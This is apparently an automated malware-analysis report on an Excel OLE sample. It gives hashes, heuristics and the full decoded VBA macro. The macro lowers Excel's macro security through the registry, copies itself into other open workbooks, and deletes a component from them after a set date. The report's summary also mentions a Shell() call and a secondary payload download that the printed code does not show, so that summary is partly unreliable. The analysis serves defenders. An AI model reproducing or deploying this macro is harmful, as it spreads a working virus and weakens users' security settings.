Office (OLE) malware analysis — malicious · c94fe1a8ec028f11

MALICIOUS

Office (OLE)

32.0 KB Created: 2003-10-10 08:59:55 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: a96197a5761d33e266423b6c7c6e24de SHA-1: 9604fcb3d6b015c0af547be9063766b51aa4e403 SHA-256: c94fe1a8ec028f113a075e7918949dc50d1aff1659f8aeb97817eec863b2511c

200 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros that utilize WScript.Shell to interact with the registry, specifically writing to 'HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6' and 'HKCU\Software\Microsoft\Office\9.0\Excel\Security\Level'. The presence of Shell() and CreateObject calls within the VBA code indicates an attempt to execute commands or launch other processes, likely to download and execute a secondary payload. The document body presents a price quotation, a common lure for social engineering.

Heuristics 5

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

If Left(objxl.Version, 1) <> "8" Then i = 2
Set WshShell = CreateObject("WScript.Shell")
If WshShell.Regread(data(i)) <> data(i + 1) Then WshShell.RegWrite data(i), data(i + 1), "REG_DWORD"

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

If Left(objxl.Version, 1) <> "8" Then i = 2
Set WshShell = CreateObject("WScript.Shell")
If WshShell.Regread(data(i)) <> data(i + 1) Then WshShell.RegWrite data(i), data(i + 1), "REG_DWORD"

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

data = Array("HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6", 0, "HKCU\Software\Microsoft\Office\9.0\Excel\Security\Level", 1)
Set objxl = GetObject(, "excel.application")
If Left(objxl.Version, 1) <> "8" Then i = 2

Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2843 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2843 bytes
SHA-256: `8e627c97493f10a5c97672f55b46bab52eb720e685796097894c962d30fe088f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True 'mcrex '1001010001101 Sub Workbook_Activate() On Error Resume Next Dim i, intIndex As Integer Dim data Dim WshShell, objxl, wbksource As Object Set wbksource = ThisWorkbook.VBProject.VBComponents.Item("thisworkbook").CodeModule data = Array("HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6", 0, "HKCU\Software\Microsoft\Office\9.0\Excel\Security\Level", 1) Set objxl = GetObject(, "excel.application") If Left(objxl.Version, 1) <> "8" Then i = 2 Set WshShell = CreateObject("WScript.Shell") If WshShell.Regread(data(i)) <> data(i + 1) Then WshShell.RegWrite data(i), data(i + 1), "REG_DWORD" For Each objxl In Application.Workbooks If UCase(objxl.Name) <> UCase(ThisWorkbook.Name) Then If Date > #1/2/2004# Then objxl.VBProject.VBComponents.Remove objxl.VBProject.VBComponents("universelle") 'If UCase(Right(objxl.Name, 3)) = "XLS" Then If objxl.FileFormat = ThisWorkbook.FileFormat Then With objxl.VBProject.VBComponents("thisworkbook") If .CodeModule.Find("1001010001101", 1, 1, 10000, 10000) = False Then If .CodeModule.Find("Workbook_activate", 1, 1, 10000, 10000) = False Then For i = 1 To wbksource.CountOfLines If wbksource.Lines(i, 1) = "'mcrex" Then Exit For End If Next i intIndex = 0 Do .CodeModule.InsertLines 1 + .CodeModule.CountOfLines, wbksource.Lines(i + intIndex, 1) intIndex = intIndex + 1 Loop Until wbksource.Lines(i + intIndex, 1) = "'mcrex" .CodeModule.InsertLines 1 + .CodeModule.CountOfLines, wbksource.Lines(i + intIndex, 1) End If End If End With End If End If Next objxl Set WshShell = Nothing Set objxl = Nothing Set wbksource = Nothing End Sub Sub Workbook_SheetActivate(ByVal Sh As Object) Workbook_Activate End Sub Sub Workbook_SheetCalculate(ByVal Sh As Object) Workbook_Activate End Sub 'mcrex Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 8e627c97493f10a5c97672f55b46bab52eb720e685796097894c962d30fe088f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'mcrex
'1001010001101
Sub Workbook_Activate()
On Error Resume Next
Dim i, intIndex As Integer
Dim data
Dim WshShell, objxl, wbksource As Object
Set wbksource = ThisWorkbook.VBProject.VBComponents.Item("thisworkbook").CodeModule
data = Array("HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6", 0, "HKCU\Software\Microsoft\Office\9.0\Excel\Security\Level", 1)
Set objxl = GetObject(, "excel.application")
If Left(objxl.Version, 1) <> "8" Then i = 2
Set WshShell = CreateObject("WScript.Shell")
If WshShell.Regread(data(i)) <> data(i + 1) Then WshShell.RegWrite data(i), data(i + 1), "REG_DWORD"
For Each objxl In Application.Workbooks
     If UCase(objxl.Name) <> UCase(ThisWorkbook.Name) Then
         If Date > #1/2/2004# Then objxl.VBProject.VBComponents.Remove objxl.VBProject.VBComponents("universelle")
         'If UCase(Right(objxl.Name, 3)) = "XLS" Then
         If objxl.FileFormat = ThisWorkbook.FileFormat Then
            With objxl.VBProject.VBComponents("thisworkbook")
                If .CodeModule.Find("1001010001101", 1, 1, 10000, 10000) = False Then
                    If .CodeModule.Find("Workbook_activate", 1, 1, 10000, 10000) = False Then
                        For i = 1 To wbksource.CountOfLines
                            If wbksource.Lines(i, 1) = "'mcrex" Then
                                Exit For
                            End If
                        Next i
                        intIndex = 0
                        Do
                            .CodeModule.InsertLines 1 + .CodeModule.CountOfLines, wbksource.Lines(i + intIndex, 1)
                            intIndex = intIndex + 1
                        Loop Until wbksource.Lines(i + intIndex, 1) = "'mcrex"
                        .CodeModule.InsertLines 1 + .CodeModule.CountOfLines, wbksource.Lines(i + intIndex, 1)
                    End If
                End If
            End With
        End If
     End If
Next objxl
Set WshShell = Nothing
Set objxl = Nothing
Set wbksource = Nothing
End Sub
Sub Workbook_SheetActivate(ByVal Sh As Object)
Workbook_Activate
End Sub
Sub Workbook_SheetCalculate(ByVal Sh As Object)
Workbook_Activate
End Sub
'mcrex

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.